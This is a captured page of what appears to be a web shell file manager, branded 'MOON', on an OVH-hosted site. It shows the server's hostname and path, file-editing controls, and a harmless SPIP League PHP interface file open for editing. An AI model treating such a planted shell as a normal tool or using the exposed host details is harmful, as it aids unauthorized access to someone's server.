┌────────────────────────────────┐ │ ░░░ ░░▓ ░▓▓ ███ ▓▓░ ▓░░ │ │ ~ M O O N ~ │ └────────────────────────────────┘
webm008.cluster103.gra.hosting.ovh.net
LOCATION:
/home/paxmediccp/www/vendor/spip-league/kernel/src
☗ ROOT
↻ REFRESH
✎ EDIT FILE
EDITING: InstallationDetectorInterface.php
<?php declare(strict_types=1); namespace SpipLeague\Component\Kernel; interface InstallationDetectorInterface { public static function fromDir(string $directory): self; public function getWay(): string; public function getDir(string $dir = 'project'): string; }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 InstallationDetector.php
PHP
2.4 KB
2026-04-27 15:53
EDIT
📄 InstallationDetectorInterface.php
PHP
279 B
2026-04-27 15:53
EDIT
📄 Kernel.php
PHP
4.7 KB
2026-04-27 15:53
EDIT